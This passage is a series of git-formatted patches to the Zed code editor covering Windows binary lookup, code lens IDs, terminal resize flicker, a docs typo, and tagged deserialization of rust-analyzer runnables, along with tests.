Invisible::Whitespace { - line_offset: tab_size as usize + 7, + line_start_offset: tab_size as usize + 7, + line_end_offset: tab_size as usize + 8, }, ]; let expected_invisibles = 
std::iter::once(repeated_invisibles) From 53b06974b0126287fddef9f50ba048ef2bfeb755 Mon Sep 17 00:00:00 2001 From: Kirill Bulatov Date: Sat, 25 Apr 2026 09:14:41 +0300 Subject: [PATCH 032/231] Fix offline lookup of clangd on Windows (#54781) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Closes https://github.com/zed-industries/zed/issues/54042 Part of https://github.com/zed-industries/zed/issues/9789 This binary was not found when Zed first downloads the release, and then rerun offline on the same project. Using a `clangd-windows-21.1.0.zip ` archive from https://github.com/clangd/clangd/releases/tag/21.1.0 ``` ~/Downloads ❯ unzip -l clangd-windows-21.1.0.zip|rg clangd.exe 46908928 08-27-2025 01:40 clangd_21.1.0/bin/clangd.exe ``` Similarly, delve releases are in https://github.com/go-delve/delve/releases and codelldb are in https://github.com/vadimcn/codelldb/releases ``` ~/Downloads ❯ unzip -l codelldb-win32-x64.vsix|rg exe 1014272 04-21-2026 03:05 extension/bin/codelldb-launch.exe 4400128 04-21-2026 03:05 extension/adapter/codelldb.exe 242176 04-14-2026 04:14 extension/lldb/bin/lldb.exe 6272000 04-14-2026 04:14 extension/lldb/bin/lldb-server.exe 96768 04-14-2026 01:42 extension/lldb/bin/lldb-argdumper.exe 96768 04-14-2026 04:13 extension/lldb/lib/lldb-python/lldb/lldb-argdumper.exe 35284 04-14-2026 01:36 extension/lldb/lib/site-packages/pip/_vendor/pygments/lexer.py 101888 04-14-2026 01:36 extension/lldb/lib/site-packages/pip/_vendor/distlib/w64.exe 168448 04-14-2026 01:36 extension/lldb/lib/site-packages/pip/_vendor/distlib/w64-arm.exe 91648 04-14-2026 01:36 extension/lldb/lib/site-packages/pip/_vendor/distlib/w32.exe 108032 04-14-2026 01:36 extension/lldb/lib/site-packages/pip/_vendor/distlib/t64.exe 182784 04-14-2026 01:36 extension/lldb/lib/site-packages/pip/_vendor/distlib/t64-arm.exe 97792 04-14-2026 01:36 extension/lldb/lib/site-packages/pip/_vendor/distlib/t32.exe 12161 04-14-2026 01:36 
extension/lldb/lib/site-packages/pip/_vendor/pygments/lexers/__init__.py 74926 04-14-2026 01:36 extension/lldb/lib/site-packages/pip/_vendor/pygments/lexers/_mapping.py 53448 04-14-2026 01:36 extension/lldb/lib/site-packages/pip/_vendor/pygments/lexers/python.py ``` Release Notes: - Fixed offline lookup of clangd on Windows --- crates/dap_adapters/src/codelldb.rs | 7 +++++-- crates/dap_adapters/src/go.rs | 8 ++++++-- crates/languages/src/c.rs | 8 ++++++-- 3 files changed, 17 insertions(+), 6 deletions(-) diff --git a/crates/dap_adapters/src/codelldb.rs b/crates/dap_adapters/src/codelldb.rs index 6c9dc0d49f9571..e4c7f3dce7b39f 100644 --- a/crates/dap_adapters/src/codelldb.rs +++ b/crates/dap_adapters/src/codelldb.rs @@ -1,4 +1,4 @@ -use std::{path::PathBuf, sync::OnceLock}; +use std::{env::consts, path::PathBuf, sync::OnceLock}; use anyhow::{Context as _, Result}; use async_trait::async_trait; @@ -374,7 +374,10 @@ impl DebugAdapter for CodeLldbDebugAdapter { } }; let adapter_dir = version_path.join("extension").join("adapter"); - let path = adapter_dir.join("codelldb").to_string_lossy().into_owned(); + let path = adapter_dir + .join(format!("codelldb{}", consts::EXE_SUFFIX)) + .to_string_lossy() + .into_owned(); self.path_to_codelldb.set(path.clone()).ok(); command = Some(path); }; diff --git a/crates/dap_adapters/src/go.rs b/crates/dap_adapters/src/go.rs index 93d0e8a958568c..7d9af1d73413be 100644 --- a/crates/dap_adapters/src/go.rs +++ b/crates/dap_adapters/src/go.rs @@ -446,7 +446,8 @@ impl DebugAdapter for GoDebugAdapter { _cx: &mut AsyncApp, ) -> Result { let adapter_path = paths::debug_adapters_dir().join(&Self::ADAPTER_NAME); - let dlv_path = adapter_path.join("dlv"); + let dlv_binary = format!("dlv{}", consts::EXE_SUFFIX); + let dlv_path = adapter_path.join(&dlv_binary); let delve_path = if let Some(path) = user_installed_path { path.to_string_lossy().into_owned() @@ -477,7 +478,10 @@ impl DebugAdapter for GoDebugAdapter { ); } - 
adapter_path.join("dlv").to_string_lossy().into_owned() + adapter_path + .join(&dlv_binary) + .to_string_lossy() + .into_owned() }; let cwd = Some( diff --git a/crates/languages/src/c.rs b/crates/languages/src/c.rs index bc75a9dbabbf06..6585863f993f30 100644 --- a/crates/languages/src/c.rs +++ b/crates/languages/src/c.rs @@ -80,7 +80,9 @@ impl LspInstaller for CLspAdapter { digest: expected_digest, } = version; let version_dir = container_dir.join(format!("clangd_{name}")); - let binary_path = version_dir.join("bin/clangd"); + let binary_path = version_dir + .join("bin") + .join(format!("clangd{}", consts::EXE_SUFFIX)); let binary = LanguageServerBinary { path: binary_path.clone(), @@ -388,7 +390,9 @@ async fn get_cached_server_binary(container_dir: PathBuf) -> Option Date: Sat, 25 Apr 2026 14:23:45 +0300 Subject: [PATCH 033/231] Fix code lens id clash (#54851) Follow-up to https://github.com/zed-industries/zed/pull/54100 Instead of relying on "line number" that could have overlapped depending on the range we query, use hierarchical IDset: `block id -> lens #` to ensure no clashes happen anymore. 
Release Notes: - N/A --- crates/editor/src/code_lens.rs | 21 +++++---------------- 1 file changed, 5 insertions(+), 16 deletions(-) diff --git a/crates/editor/src/code_lens.rs b/crates/editor/src/code_lens.rs index 87d2426878e575..e93757cb3a0918 100644 --- a/crates/editor/src/code_lens.rs +++ b/crates/editor/src/code_lens.rs @@ -76,8 +76,6 @@ fn group_lenses_by_row( } fn render_code_lens_line( - buffer_id: BufferId, - line_number: usize, lens: CodeLensLine, editor: WeakEntity, ) -> impl Fn(&mut crate::display_map::BlockContext) -> gpui::AnyElement { @@ -103,11 +101,10 @@ fn render_code_lens_line( let action = item.action.clone(); let editor_handle = editor.clone(); let position = lens.position; - let id = SharedString::from(format!("{buffer_id}:{line_number}:{i}")); children.push( div() - .id(ElementId::Name(id)) + .id(ElementId::from(i)) .font(font.clone()) .text_size(font_size) .text_color(cx.app.theme().colors().text_muted) @@ -164,6 +161,7 @@ fn render_code_lens_line( } div() + .id(cx.block_id) .pl(cx.margins.gutter.full_width() + cx.em_width * (lens.indent_column as f32 + 0.5)) .h_full() .flex() @@ -405,16 +403,13 @@ impl Editor { } let blocks = lens_lines .into_iter() - .enumerate() - .map(|(line_number, lens_line)| { + .map(|lens_line| { let position = lens_line.position; BlockProperties { placement: BlockPlacement::Above(position), height: Some(1), style: BlockStyle::Flex, render: Arc::new(render_code_lens_line( - buffer_id, - line_number, lens_line, editor_handle.clone(), )), @@ -546,19 +541,13 @@ impl Editor { .collect(); let blocks = group_lenses_by_row(lenses, &multi_buffer_snapshot) - .enumerate() - .map(|(line_number, lens_line)| { + .map(|lens_line| { let position = lens_line.position; BlockProperties { placement: BlockPlacement::Above(position), height: Some(1), style: BlockStyle::Flex, - render: Arc::new(render_code_lens_line( - buffer_id, - line_number, - lens_line, - editor_handle.clone(), - )), + render: Arc::new(render_code_lens_line(lens_line, 
editor_handle.clone())), priority: 0, } }) From b7ff4280603a35fd905e7d9a6cecc166951a785e Mon Sep 17 00:00:00 2001 From: Finn Eitreim <48069764+feitreim@users.noreply.github.com> Date: Mon, 27 Apr 2026 02:58:07 -0400 Subject: [PATCH 034/231] editor: Make `editor: expand excerpts` actually expand all excerpts (#54717) Expand all excerpts had a doc comment describing it as expanding all excerpts, but in practice it only expanded the excerpt that was the most relevant. I fixed that to make it expand all excerpts. video: https://github.com/user-attachments/assets/9858ebda-199c-4f72-8a2f-3cd606b0eff4 Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #54651 Release Notes: - editor: `expand excerpts` now has correct documentation explaining its function. --- crates/editor/src/actions.rs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/crates/editor/src/actions.rs b/crates/editor/src/actions.rs index 8f14e51fb5a2f7..ccd60186523a32 100644 --- a/crates/editor/src/actions.rs +++ b/crates/editor/src/actions.rs @@ -192,7 +192,7 @@ pub struct SelectDownByLines { pub(super) lines: u32, } -/// Expands all excerpts in the editor. +/// Expands all excerpts with selections. #[derive(PartialEq, Clone, Deserialize, Default, JsonSchema, Action)] #[action(namespace = editor)] #[serde(deny_unknown_fields)] From bb5600ec3c5c53d9362a9b12f51783b32a5449dd Mon Sep 17 00:00:00 2001 From: Bing Wang Date: Mon, 27 Apr 2026 15:13:44 +0800 Subject: [PATCH 035/231] terminal: Reduce flicker on resize (#47195) Skip PTY resizes for pixel-only changes and coalesce pending resize events. 
Snap standalone terminal layout to whole device pixels to avoid subpixel jitter. before: https://github.com/user-attachments/assets/0ad0db83-0099-44c8-b8d1-3dc8146b25ef after: https://github.com/user-attachments/assets/86278014-1c87-4263-a9e5-b58bcc1fa2ea Release Notes: - Fixed: Reduce terminal flicker on resize --------- Signed-off-by: pigletfly Co-authored-by: Ben Kunkle --- crates/terminal/src/terminal.rs | 68 +++++++++++++++++++- crates/terminal_view/src/terminal_element.rs | 63 ++++++++++++++---- 2 files changed, 118 insertions(+), 13 deletions(-) diff --git a/crates/terminal/src/terminal.rs b/crates/terminal/src/terminal.rs index e47cc2bb8d0d21..3be023e8262f04 100644 --- a/crates/terminal/src/terminal.rs +++ b/crates/terminal/src/terminal.rs @@ -1440,8 +1440,27 @@ impl Terminal { ///Resize the terminal and the PTY. pub fn set_size(&mut self, new_bounds: TerminalBounds) { - if self.last_content.terminal_bounds != new_bounds { - self.events.push_back(InternalEvent::Resize(new_bounds)) + let mut new_bounds = new_bounds; + new_bounds.bounds.size.height = cmp::max(new_bounds.line_height, new_bounds.height()); + new_bounds.bounds.size.width = cmp::max(new_bounds.cell_width, new_bounds.width()); + + let old_bounds = self.last_content.terminal_bounds; + self.last_content.terminal_bounds = new_bounds; + + // Avoid spamming PTY resizes on pixel-level size changes (e.g. while dragging edges), + // since those can generate excessive SIGWINCH/reflows and cause visible flicker. 
+ let requires_resize = old_bounds.num_lines() != new_bounds.num_lines() + || old_bounds.num_columns() != new_bounds.num_columns() + || old_bounds.cell_width != new_bounds.cell_width + || old_bounds.line_height != new_bounds.line_height; + + if !requires_resize { + return; + } + + match self.events.back_mut() { + Some(InternalEvent::Resize(pending_bounds)) => *pending_bounds = new_bounds, + _ => self.events.push_back(InternalEvent::Resize(new_bounds)), } } @@ -3036,6 +3055,51 @@ mod tests { ); } + #[gpui::test] + async fn test_set_size_coalesces_pixel_only_changes(cx: &mut TestAppContext) { + let builder = cx.update(|cx| { + TerminalBuilder::new_display_only( + CursorShape::Block, + AlternateScroll::On, + None, + 0, + cx.background_executor(), + PathStyle::local(), + ) + .unwrap() + }); + let mut terminal = builder.terminal; + + let base_bounds = TerminalBounds { + cell_width: Pixels::from(10.), + line_height: Pixels::from(10.), + bounds: bounds( + Point::default(), + size(Pixels::from(100.), Pixels::from(100.)), + ), + }; + + terminal.set_size(base_bounds); + terminal.events.clear(); + assert_eq!(terminal.last_content.terminal_bounds, base_bounds); + + // Pixel-only change: height grows by 1px but still the same number of rows/cols. + let mut pixel_changed = base_bounds; + pixel_changed.bounds.size.height = Pixels::from(101.); + terminal.set_size(pixel_changed); + assert!(terminal.events.is_empty()); + assert_eq!(terminal.last_content.terminal_bounds, pixel_changed); + + // Grid change: height increases enough to add a row. 
+ let mut grid_changed = base_bounds; + grid_changed.bounds.size.height = Pixels::from(110.); + terminal.set_size(grid_changed); + assert!(matches!( + terminal.events.back(), + Some(InternalEvent::Resize(_)) + )); + } + fn get_cells(size: TerminalBounds, rng: &mut StdRng) -> Vec> { let mut cells = Vec::new(); diff --git a/crates/terminal_view/src/terminal_element.rs b/crates/terminal_view/src/terminal_element.rs index 1e07e1c49d43ac..8f46e8f9b27af4 100644 --- a/crates/terminal_view/src/terminal_element.rs +++ b/crates/terminal_view/src/terminal_element.rs @@ -50,7 +50,6 @@ pub struct LayoutState { mode: TermMode, display_offset: usize, hyperlink_tooltip: Option, - gutter: Pixels, block_below_cursor_element: Option, base_text_style: TextStyle, content_mode: ContentMode, @@ -970,6 +969,7 @@ impl Element for TerminalElement { let mut size = bounds.size; size.width -= gutter; + let available_height = size.height; // https://github.com/zed-industries/zed/issues/2750 // if the terminal is one column wide, rendering 🦀 @@ -981,6 +981,43 @@ impl Element for TerminalElement { let mut origin = bounds.origin; origin.x += gutter; + if matches!(self.terminal_view.read(cx).mode, TerminalMode::Standalone) { + let scale_factor = window.scale_factor(); + let line_height_pixels = px(line_height); + let line_height_device_px = (f32::from(line_height_pixels) * scale_factor) + .round() + .max(1.0) as i32; + let available_height_device_px = + (f32::from(available_height) * scale_factor) + .floor() + .max(0.0) as i32; + + let rows = + ((available_height_device_px / line_height_device_px) as usize).max(1); + let snapped_height_device_px = (rows as i32) * line_height_device_px; + let padding_device_px = + (available_height_device_px - snapped_height_device_px).max(0); + + let snapped_height = + px(snapped_height_device_px as f32 / scale_factor.max(1.0)); + let padding = px(padding_device_px as f32 / scale_factor.max(1.0)); + + size.height = snapped_height; + if 
self.terminal.read(cx).scrolled_to_bottom() { + origin.y += padding; + } + } + + // Snap to device pixels to avoid subpixel jitter while resizing. + // Terminal rendering is grid-based; allowing fractional origins can cause the + // glyph rasterization to shift between frames, which looks like flicker. + let scale_factor = window.scale_factor(); + let snap_px = |value: Pixels| { + Pixels::from((f32::from(value) * scale_factor).floor() / scale_factor) + }; + origin.x = snap_px(origin.x); + origin.y = snap_px(origin.y); + ( TerminalBounds::new(px(line_height), cell_width, Bounds { origin, size }), line_height, @@ -1018,7 +1055,7 @@ impl Element for TerminalElement { let scroll_top = self.terminal_view.read(cx).scroll_top; let hyperlink_tooltip = hover_tooltip.map(|hover_tooltip| { - let offset = bounds.origin + point(gutter, px(0.)) - point(px(0.), scroll_top); + let offset = dimensions.bounds.origin - point(px(0.), scroll_top); let mut element = div() .size_full() .id("terminal-element") @@ -1062,8 +1099,9 @@ impl Element for TerminalElement { // // This optimization is analogous to the editor optimization in PR #45077 // which fixed performance issues with large AutoHeight editors inside Lists. + let content_bounds = dimensions.bounds; let visible_bounds = window.content_mask().bounds; - let intersection = visible_bounds.intersect(&bounds); + let intersection = visible_bounds.intersect(&content_bounds); // If the terminal is entirely outside the viewport, skip all cell processing. // This handles the case where the terminal has been scrolled past (above or @@ -1073,7 +1111,7 @@ impl Element for TerminalElement { || intersection.size.width <= px(0.) { (Vec::new(), Vec::new()) - } else if intersection == bounds { + } else if intersection == content_bounds { // Fast path: terminal fully visible, no clipping needed. // Avoid grouping/allocation overhead by streaming cells directly. 
TerminalElement::layout_grid( @@ -1092,9 +1130,9 @@ impl Element for TerminalElement { // by screen position (enumerated line group index), not by the cell's // internal line number (which can be negative in Scrollable mode for // scrollback history). - let rows_above_viewport = - f32::from((intersection.top() - bounds.top()).max(px(0.)) / line_height_px) - as usize; + let rows_above_viewport = f32::from( + (intersection.top() - content_bounds.top()).max(px(0.)) / line_height_px, + ) as usize; let visible_row_count = f32::from((intersection.size.height / line_height_px).ceil()) as usize + 1; @@ -1199,7 +1237,7 @@ impl Element for TerminalElement { block.height as f32 * dimensions.line_height(), ), ); - let origin = bounds.origin + let origin = Point::new(bounds.origin.x, dimensions.bounds.origin.y) + point(px(0.), target_line as f32 * dimensions.line_height()) - point(px(0.), scroll_top); window.with_rem_size(rem_size, |window| { @@ -1225,7 +1263,6 @@ impl Element for TerminalElement { mode, display_offset, hyperlink_tooltip, - gutter, block_below_cursor_element, base_text_style: text_style, content_mode, @@ -1249,8 +1286,12 @@ impl Element for TerminalElement { let scroll_top = self.terminal_view.read(cx).scroll_top; window.paint_quad(fill(bounds, layout.background_color)); - let origin = - bounds.origin + Point::new(layout.gutter, px(0.)) - Point::new(px(0.), scroll_top); + let origin = layout.dimensions.bounds.origin - Point::new(px(0.), scroll_top); + let scale_factor = window.scale_factor(); + let snap_px = |value: Pixels| { + Pixels::from((f32::from(value) * scale_factor).floor() / scale_factor) + }; + let origin = point(snap_px(origin.x), snap_px(origin.y)); let marked_text_cloned: Option = { let ime_state = &self.terminal_view.read(cx).ime_state; From cb4312bb215ffb9611013c699a69bfb9f710f984 Mon Sep 17 00:00:00 2001 From: illimarkangur <116028111+illimarkangur@users.noreply.github.com> Date: Mon, 27 Apr 2026 10:32:47 +0300 Subject: [PATCH 036/231] docs: Fix 
a typo in themes.md (#54919) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Fixed accidental duplication of words in themes.md --- docs/src/themes.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/docs/src/themes.md b/docs/src/themes.md index 1dd2c144e2a2a5..d78f96250872ee 100644 --- a/docs/src/themes.md +++ b/docs/src/themes.md @@ -106,7 +106,7 @@ For example, add the following to your `settings.json` if you wish to override t } ``` -To see a comprehensive list of list of captures (like `comment` and `comment.doc`) see [Language Extensions: Syntax highlighting](./extensions/languages.md#syntax-highlighting). +To see a comprehensive list of captures (like `comment` and `comment.doc`) see [Language Extensions: Syntax highlighting](./extensions/languages.md#syntax-highlighting). To see a list of available theme attributes look at the JSON file for your theme. For example, [assets/themes/one/one.json](https://github.com/zed-industries/zed/blob/main/assets/themes/one/one.json) for the default One Dark and One Light themes. From 88e017112b21c0fb263e31d81d0d756ce9fdbfa2 Mon Sep 17 00:00:00 2001 From: Rain Date: Mon, 27 Apr 2026 00:36:43 -0700 Subject: [PATCH 037/231] project: Use runnable kind to disambiguate between cargo and shell commands (#54011) Found this bug while investigating why configuring nextest based on the instructions at https://github.com/rust-lang/rust-analyzer/issues/21137#issuecomment-4254611341 wasn't working within Zed. Previously, we'd use `serde(untagged)`, preferring cargo over shell commands. 
The problem is that every instance of a shell command is a valid instance of a cargo command. For example, the shell command: ```json { "label": "test my_test", "kind": "shell", "args": { "environment": {"RUSTC_TOOLCHAIN": "/path/to/toolchain"}, "cwd": "/project", "program": "cargo", "args": ["nextest", "run", "--package", "my-crate", "--lib", "--", "my_test", "--exact", "--include-ignored"] } } ``` would end up getting deserialized as a Cargo command, silently dropping `program` and `args`. With this fix, we now use the provided `kind` as a tag. We do have to introduce a `#[serde(flatten)]` unfortunately, which has a few side effects due to internal buffering, but `#[serde(untagged)]` also does internal buffering so this doesn't make things worse. I've manually tested this by configuring: ```json { "lsp": { "rust-analyzer": { "initialization_options": { "runnables": { "test": { "overrideCommand": [ "cargo", "nextest", "run", "--package", "${package}", "${target_arg}", "${target}", "--", "${test_name}", "${exact}", "${include_ignored}" ] } } } } } } ``` and ensuring that nextest is correctly invoked. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Fixed deserialization of rust-analyzer shell runnables. 
--------- Co-authored-by: Kirill Bulatov --- crates/editor/src/runnables.rs | 157 +++++++++++++++++- .../project/src/lsp_store/lsp_ext_command.rs | 109 ++++++++++-- 2 files changed, 253 insertions(+), 13 deletions(-) diff --git a/crates/editor/src/runnables.rs b/crates/editor/src/runnables.rs index b17b9944173629..25db455d462afd 100644 --- a/crates/editor/src/runnables.rs +++ b/crates/editor/src/runnables.rs @@ -715,7 +715,9 @@ mod tests { use multi_buffer::{MultiBuffer, PathKey}; use project::{ FakeFs, Project, ProjectPath, - lsp_store::lsp_ext_command::{CargoRunnableArgs, Runnable, RunnableArgs, RunnableKind}, + lsp_store::lsp_ext_command::{ + CargoRunnableArgs, Runnable, RunnableArgs, ShellRunnableArgs, + }, }; use serde_json::json; use task::{TaskTemplate, TaskTemplates}; @@ -1028,7 +1030,6 @@ mod tests { lsp::Position::new(3, 1), ), }), - kind: RunnableKind::Cargo, args: RunnableArgs::Cargo(CargoRunnableArgs { environment: Default::default(), cwd: path!("/project").into(), @@ -1174,4 +1175,156 @@ mod tests { "Runnables should appear after the buffer is saved to disk" ); } + + // Verifies that a shell runnable from rust-analyzer produces + // a task template that uses the shell program and args. + #[gpui::test] + async fn test_shell_runnable_produces_correct_task_template(cx: &mut TestAppContext) { + init_test(cx, |_| {}); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/project"), + json!({ + "main.rs": indoc! 
{" + #[test] + fn test_one() { + assert!(true); + } + "}, + }), + ) + .await; + + let project = Project::test(fs, [path!("/project").as_ref()], cx).await; + let language_registry = project.read_with(cx, |project, _| project.languages().clone()); + language_registry.add(rust_lang_with_lsp_task_context()); + + let mut fake_servers = language_registry.register_fake_lsp( + "Rust", + FakeLspAdapter { + name: FAKE_LSP_NAME, + ..FakeLspAdapter::default() + }, + ); + + let buffer = project + .update(cx, |project, cx| { + project.open_local_buffer(path!("/project/main.rs"), cx) + }) + .await + .unwrap(); + + let buffer_id = buffer.read_with(cx, |buffer, _| buffer.remote_id()); + + let multi_buffer = cx.new(|cx| MultiBuffer::singleton(buffer.clone(), cx)); + let editor = cx.add_window(|window, cx| { + build_editor_with_project(project.clone(), multi_buffer, window, cx) + }); + + let fake_server = fake_servers.next().await.expect("fake LSP server"); + + use project::lsp_store::lsp_ext_command::Runnables; + fake_server.set_request_handler::(move |params, _| async move { + let text = params.text_document.uri.path().to_string(); + if text.contains("main.rs") { + let uri = lsp::Uri::from_file_path(path!("/project/main.rs")).expect("valid uri"); + Ok(vec![Runnable { + label: "nextest test_one".into(), + location: Some(lsp::LocationLink { + origin_selection_range: None, + target_uri: uri, + target_range: lsp::Range::new( + lsp::Position::new(0, 0), + lsp::Position::new(3, 1), + ), + target_selection_range: lsp::Range::new( + lsp::Position::new(0, 0), + lsp::Position::new(3, 1), + ), + }), + args: RunnableArgs::Shell(ShellRunnableArgs { + environment: Default::default(), + cwd: path!("/project").into(), + program: "cargo".into(), + args: vec![ + "nextest".into(), + "run".into(), + "--package".into(), + "my-crate".into(), + "--lib".into(), + "--".into(), + "test_one".into(), + "--exact".into(), + ], + }), + }]) + } else { + Ok(Vec::new()) + } + }); + + editor + .update(cx, |editor, 
window, cx| { + editor.refresh_runnables(None, window, cx); + }) + .expect("editor update"); + cx.executor().advance_clock(UPDATE_DEBOUNCE); + cx.executor().run_until_parked(); + + let labels = editor + .update(cx, |editor, _, _| collect_runnable_labels(editor)) + .expect("editor update"); + assert_eq!( + labels, + vec![(buffer_id, 0, vec!["nextest test_one".to_string()])], + "shell runnable should appear for #[test] fn" + ); + + let templates = editor + .update(cx, |editor, _, _| { + editor + .runnables + .runnables + .iter() + .flat_map(|(_, (_, tasks))| { + tasks.iter().flat_map(|(_, runnable_tasks)| { + runnable_tasks + .templates + .iter() + .map(|(_, template)| { + ( + template.label.clone(), + template.command.clone(), + template.args.clone(), + ) + }) + .collect::>() + }) + }) + .collect::>() + }) + .expect("editor update"); + + let (label, command, args) = templates + .iter() + .find(|(label, _, _)| label == "nextest test_one") + .expect("shell runnable task template should exist"); + assert_eq!(label, "nextest test_one"); + assert_eq!(command, "cargo"); + assert_eq!( + args, + &[ + "nextest", + "run", + "--package", + "my-crate", + "--lib", + "--", + "test_one", + "--exact", + ], + "shell runnable should preserve program args" + ); + } } diff --git a/crates/project/src/lsp_store/lsp_ext_command.rs b/crates/project/src/lsp_store/lsp_ext_command.rs index 55395bd066326f..bb994492d00f94 100644 --- a/crates/project/src/lsp_store/lsp_ext_command.rs +++ b/crates/project/src/lsp_store/lsp_ext_command.rs @@ -501,7 +501,41 @@ impl LspCommand for GoToParentModule { } // https://rust-analyzer.github.io/book/contributing/lsp-extensions.html#runnables -// Taken from https://github.com/rust-lang/rust-analyzer/blob/a73a37a757a58b43a796d3eb86a1f7dfd0036659/crates/rust-analyzer/src/lsp/ext.rs#L425-L489 +// Taken from https://github.com/rust-lang/rust-analyzer/blob/3aaa35b49ef27e15144952aa4f7ba3eecd36fbb4/crates/rust-analyzer/src/lsp/ext.rs#L425-L489 +// +// Note that in 
rust-analyzer, `Runnable` is defined as: +// +// ``` +// #[derive(Deserialize, Serialize, Debug, Clone)] +// #[serde(rename_all = "camelCase")] +// pub struct Runnable { +// pub label: String, +// #[serde(skip_serializing_if = "Option::is_none")] +// pub location: Option, +// pub kind: RunnableKind, +// pub args: RunnableArgs, +// } +// +// #[derive(Deserialize, Serialize, Debug, Clone)] +// #[serde(rename_all = "camelCase")] +// #[serde(untagged)] +// pub enum RunnableArgs { +// Cargo(CargoRunnableArgs), +// Shell(ShellRunnableArgs), +// } +// ``` +// +// i.e., RunnableArgs uses serde(untagged) and is not associated with +// RunnableKind. But rust-analyzer always syncs RunnableKind with RunnableArgs: +// +// * https://github.com/rust-lang/rust-analyzer/blob/3aaa35b49ef27e15144952aa4f7ba3eecd36fbb4/crates/rust-analyzer/src/lsp/to_proto.rs#L1608-L1633 +// * https://github.com/rust-lang/rust-analyzer/blob/3aaa35b49ef27e15144952aa4f7ba3eecd36fbb4/crates/rust-analyzer/src/lsp/to_proto.rs#L1648-L1653 +// * https://github.com/rust-lang/rust-analyzer/blob/3aaa35b49ef27e15144952aa4f7ba3eecd36fbb4/crates/rust-analyzer/src/handlers/request.rs#L1052-L1066 +// +// And it really doesn't make any sense for it to be any other way. On top of +// that, the Shell and Cargo variants are similar enough that serde(untagged) +// deserialization has been observed to confuse one for the other. So we rely on +// RunnableKind to determine which variant to deserialize. pub enum Runnables {} impl lsp::request::Request for Runnables { @@ -524,25 +558,20 @@ pub struct Runnable { pub label: String, #[serde(default, skip_serializing_if = "Option::is_none")] pub location: Option, - pub kind: RunnableKind, + #[serde(flatten)] pub args: RunnableArgs, } +/// The `kind` field in the JSON determines which variant is deserialized; see +/// comment on `Runnables` above for more discussion. 
#[derive(Deserialize, Serialize, Debug, Clone)] -#[serde(rename_all = "camelCase")] -#[serde(untagged)] +#[serde(tag = "kind", content = "args")] +#[serde(rename_all = "lowercase")] pub enum RunnableArgs { Cargo(CargoRunnableArgs), Shell(ShellRunnableArgs), } -#[derive(Serialize, Deserialize, Debug, Clone)] -#[serde(rename_all = "lowercase")] -pub enum RunnableKind { - Cargo, - Shell, -} - #[derive(Deserialize, Serialize, Debug, Clone)] #[serde(rename_all = "camelCase")] pub struct CargoRunnableArgs { @@ -791,3 +820,61 @@ impl lsp::notification::Notification for LspExtClearFlycheck { type Params = (); const METHOD: &'static str = "rust-analyzer/clearFlycheck"; } + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn shell_runnable_deserializes_as_shell() { + // rust-analyzer sends this when `runnables.test.overrideCommand` is + // configured (e.g. for nextest). + let json = serde_json::json!({ + "label": "test my_test", + "kind": "shell", + "args": { + "environment": {"RUSTC_TOOLCHAIN": "/path/to/toolchain"}, + "cwd": "/project", + "program": "cargo", + "args": ["nextest", "run", "--package", "my-crate", "--lib", "--", "my_test", "--exact", "--include-ignored"] + } + }); + + let runnable: Runnable = + serde_json::from_value(json).expect("shell runnable should deserialize"); + let RunnableArgs::Shell(shell) = &runnable.args else { + panic!("expected Shell variant, got {:?}", runnable.args); + }; + assert_eq!(shell.program, "cargo"); + assert_eq!(shell.args[0], "nextest"); + assert_eq!(shell.args[1], "run"); + } + + #[test] + fn cargo_runnable_deserializes_as_cargo() { + // Standard cargo runnable from rust-analyzer. 
+ let json = serde_json::json!({ + "label": "cargo test -p my-crate", + "kind": "cargo", + "args": { + "environment": {}, + "cwd": "/project", + "overrideCargo": null, + "workspaceRoot": "/project", + "cargoArgs": ["test", "--package", "my-crate", "--lib"], + "executableArgs": ["my_test", "--exact"] + } + }); + + let runnable: Runnable = + serde_json::from_value(json).expect("cargo runnable should deserialize"); + let RunnableArgs::Cargo(cargo) = &runnable.args else { + panic!("expected Cargo variant, got {:?}", runnable.args); + }; + assert_eq!( + cargo.cargo_args, + vec!["test", "--package", "my-crate", "--lib"] + ); + assert_eq!(cargo.executable_args, vec!["my_test", "--exact"]); + } +} From 869e7767bf1b76a8d22b507482ca025657bd9a22 Mon Sep 17 00:00:00 2001 From: Danilo Leal <67129314+danilo-leal@users.noreply.github.com> Date: Mon, 27 Apr 2026 05:33:40 -0300 Subject: [PATCH 038/231] Fix spinner in activity indicator (#54977) Quick fix for a little regression I introduced in https://github.com/zed-industries/zed/pull/54791 accidentally removing the rotating spinner icon in the activity indicator. 
